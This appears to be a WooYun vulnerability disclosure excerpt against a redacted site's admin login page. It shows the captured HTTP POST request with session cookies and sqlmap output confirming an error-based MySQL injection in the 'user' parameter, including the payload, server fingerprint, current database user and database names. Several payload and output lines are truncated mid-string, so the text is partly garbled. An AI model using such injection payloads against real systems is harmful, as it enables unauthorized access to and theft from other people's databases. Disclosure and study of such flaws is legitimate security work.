WooYun.org

http://**.**.**.**/admin.php

POST /admin.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/admin.php
Cookie: _ga=GA1.3.1528296564.1448336572; PHPSESSID=f6d4d15tn5gn8ugmdf00gktcp3; __utma=170298534.1528296564.1448336572.1452493683.1452585437.3; __utmc=170298534; __utmz=170298534.1452489119.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=site%3A%2A.tw%20inurl%3A%3D
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
user=admin&password=afaf

Place: POST
Parameter: user
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: user=admin' AND (SELECT 8764 FROM(SELECT COUNT(*),CO
3a,(SELECT (CASE WHEN (8764=8764) THEN 1 ELSE 0 END)),0x3a6463703
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'S
word=afaf
---
there were multiple injection points, please select the one to us
 injections:
[0] place: POST, parameter: user, type: Single quoted string (def
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
>
[14:25:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0
[14:25:24] [INFO] fetching current user
[14:25:25] [INFO] retrieved: becare@localhost
current user:    'becare@localhost'

available databases [2]:
[*] geomatics
[*] information_schema